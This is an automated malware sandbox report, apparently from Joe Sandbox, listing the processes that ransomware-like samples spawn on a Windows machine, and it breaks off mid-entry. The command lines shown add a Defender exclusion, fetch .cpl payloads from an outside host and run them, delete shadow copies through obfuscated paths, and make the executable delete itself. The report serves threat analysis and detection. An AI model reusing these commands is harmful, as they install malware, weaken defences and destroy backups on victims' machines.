                                                                                                                                                File size:289'792 bytes
                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:8
                                                                                                                                                Start time:03:54:00
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff704000000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:9
                                                                                                                                                Start time:03:54:00
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $env:tmp
                                                                                                                                                Imagebase:0x7ff63c0a0000
                                                                                                                                                File size:452'608 bytes
                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:10
                                                                                                                                                Start time:03:54:00
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                Imagebase:0x7ff7d3e90000
                                                                                                                                                File size:55'320 bytes
                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:false

                                                                                                                                                Target ID:11
                                                                                                                                                Start time:03:54:00
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=2012,i,1751520470238867524,1103501231099164718,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                Imagebase:0x7ff776010000
                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:false

                                                                                                                                                Target ID:14
                                                                                                                                                Start time:03:54:06
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl
                                                                                                                                                Imagebase:0x7ff6b9b80000
                                                                                                                                                File size:289'792 bytes
                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:15
                                                                                                                                                Start time:03:54:06
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff704000000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:16
                                                                                                                                                Start time:03:54:06
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl
                                                                                                                                                Imagebase:0x7ff63c0a0000
                                                                                                                                                File size:452'608 bytes
                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:19
                                                                                                                                                Start time:03:54:18
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c control C:\Users\user\AppData\Local\Temp/fjeljies.cpl
                                                                                                                                                Imagebase:0x7ff6b9b80000
                                                                                                                                                File size:289'792 bytes
                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:20
                                                                                                                                                Start time:03:54:18
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff704000000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:21
                                                                                                                                                Start time:03:54:18
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\System32\control.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:control C:\Users\user\AppData\Local\Temp/fjeljies.cpl
                                                                                                                                                Imagebase:0x7ff7e7710000
                                                                                                                                                File size:164'352 bytes
                                                                                                                                                MD5 hash:11C18DBF352D81C9532A8EF442151CB1
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:22
                                                                                                                                                Start time:03:54:18
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL C:\Users\user\AppData\Local\Temp/fjeljies.cpl
                                                                                                                                                Imagebase:0x7ff692010000
                                                                                                                                                File size:71'680 bytes
                                                                                                                                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:23
                                                                                                                                                Start time:03:54:18
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\Users\user\AppData\Local\Temp/fjeljies.cpl
                                                                                                                                                Imagebase:0xd50000
                                                                                                                                                File size:61'440 bytes
                                                                                                                                                MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:24
                                                                                                                                                Start time:03:54:23
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
                                                                                                                                                Imagebase:0x1f0000
                                                                                                                                                File size:236'544 bytes
                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:25
                                                                                                                                                Start time:03:54:23
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff704000000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:26
                                                                                                                                                Start time:03:54:23
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
                                                                                                                                                Imagebase:0xc60000
                                                                                                                                                File size:433'152 bytes
                                                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:28
                                                                                                                                                Start time:03:54:28
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
                                                                                                                                                Imagebase:0x1f0000
                                                                                                                                                File size:236'544 bytes
                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:29
                                                                                                                                                Start time:03:54:28
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff704000000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:30
                                                                                                                                                Start time:03:54:28
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
                                                                                                                                                Imagebase:0xc60000
                                                                                                                                                File size:433'152 bytes
                                                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:31
                                                                                                                                                Start time:03:54:33
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:cmd /c %temp%/eryy65ty.exe
                                                                                                                                                Imagebase:0x1f0000
                                                                                                                                                File size:236'544 bytes
                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:32
                                                                                                                                                Start time:03:54:33
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff704000000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:33
                                                                                                                                                Start time:03:54:33
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp/eryy65ty.exe
                                                                                                                                                Imagebase:0xa60000
                                                                                                                                                File size:902'856 bytes
                                                                                                                                                MD5 hash:9049FABA5517305C44BD5F28398FB6B9
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                • Detection: 83%, ReversingLabs
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:34
                                                                                                                                                Start time:03:54:39
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:c:\IgQfcH\IgQf\..\..\Windows\IgQf\IgQf\..\..\system32\IgQf\IgQf\..\..\wbem\IgQf\IgQfc\..\..\wmic.exe shadowcopy delete
                                                                                                                                                Imagebase:0x7ff64f080000
                                                                                                                                                File size:576'000 bytes
                                                                                                                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:35
                                                                                                                                                Start time:03:54:39
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff704000000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:41
                                                                                                                                                Start time:03:54:50
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
                                                                                                                                                Imagebase:0xa60000
                                                                                                                                                File size:902'856 bytes
                                                                                                                                                MD5 hash:9049FABA5517305C44BD5F28398FB6B9
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:42
                                                                                                                                                Start time:03:54:56
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:c:\HdMVWr\HdMV\..\..\Windows\HdMV\HdMV\..\..\system32\HdMV\HdMV\..\..\wbem\HdMV\HdMVW\..\..\wmic.exe shadowcopy delete
                                                                                                                                                Imagebase:0x7ff64f080000
                                                                                                                                                File size:576'000 bytes
                                                                                                                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:43
                                                                                                                                                Start time:03:54:56
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff704000000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:44
                                                                                                                                                Start time:03:54:59
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
                                                                                                                                                Imagebase:0xa60000
                                                                                                                                                File size:902'856 bytes
                                                                                                                                                MD5 hash:9049FABA5517305C44BD5F28398FB6B9
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:45
                                                                                                                                                Start time:03:55:04
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:c:\ihzCRF\ihzC\..\..\Windows\ihzC\ihzC\..\..\system32\ihzC\ihzC\..\..\wbem\ihzC\ihzCR\..\..\wmic.exe shadowcopy delete
                                                                                                                                                Imagebase:0x7ff64f080000
                                                                                                                                                File size:576'000 bytes
                                                                                                                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:46
                                                                                                                                                Start time:03:55:04
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff704000000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:47
                                                                                                                                                Start time:03:55:07
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:c:\ONkVQK\ONkV\..\..\Windows\ONkV\ONkV\..\..\system32\ONkV\ONkV\..\..\wbem\ONkV\ONkVQ\..\..\wmic.exe shadowcopy delete
                                                                                                                                                Imagebase:0x7ff64f080000
                                                                                                                                                File size:576'000 bytes
                                                                                                                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:48
                                                                                                                                                Start time:03:55:07
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
                                                                                                                                                Imagebase:0x1f0000
                                                                                                                                                File size:236'544 bytes
                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:49
                                                                                                                                                Start time:03:55:07
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff704000000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:50
                                                                                                                                                Start time:03:55:07
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff704000000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:51
                                                                                                                                                Start time:03:55:08
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                Imagebase:0xe40000
                                                                                                                                                File size:18'944 bytes
                                                                                                                                                MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:52
                                                                                                                                                Start time:03:55:12
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\System32\notepad.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt
                                                                                                                                                Imagebase:0x7ff6f40e0000
                                                                                                                                                File size:201'216 bytes
                                                                                                                                                MD5 hash:27F71B12CB585541885A31BE22F61C83
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:false

                                                                                                                                                Target ID:56
                                                                                                                                                Start time:03:55:23
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:c:\MqHRzl\MqHR\..\..\Windows\MqHR\MqHR\..\..\system32\MqHR\MqHR\..\..\wbem\MqHR\MqHRz\..\..\wmic.exe shadowcopy delete
                                                                                                                                                Imagebase:0x7ff702660000
                                                                                                                                                File size:576'000 bytes
                                                                                                                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:57
                                                                                                                                                Start time:03:55:23
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
                                                                                                                                                Imagebase:0x1f0000
                                                                                                                                                File size:236'544 bytes
                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:58
                                                                                                                                                Start time:03:55:23
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff704000000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:59
                                                                                                                                                Start time:03:55:23
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff704000000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:60
                                                                                                                                                Start time:03:55:23
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                Imagebase:0xdd0000
                                                                                                                                                File size:18'944 bytes
                                                                                                                                                MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:61
                                                                                                                                                Start time:03:55:28
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:c:\sZJidg\sZJi\..\..\Windows\sZJi\sZJi\..\..\system32\sZJi\sZJi\..\..\wbem\sZJi\sZJid\..\..\wmic.exe shadowcopy delete
                                                                                                                                                Imagebase:0x7ff702660000
                                                                                                                                                File size:576'000 bytes
                                                                                                                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:62
                                                                                                                                                Start time:03:55:28
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
                                                                                                                                                Imagebase:0x1f0000
                                                                                                                                                File size:236'544 bytes
                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:63
                                                                                                                                                Start time:03:55:28
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff704000000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:64
                                                                                                                                                Start time:03:55:28
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
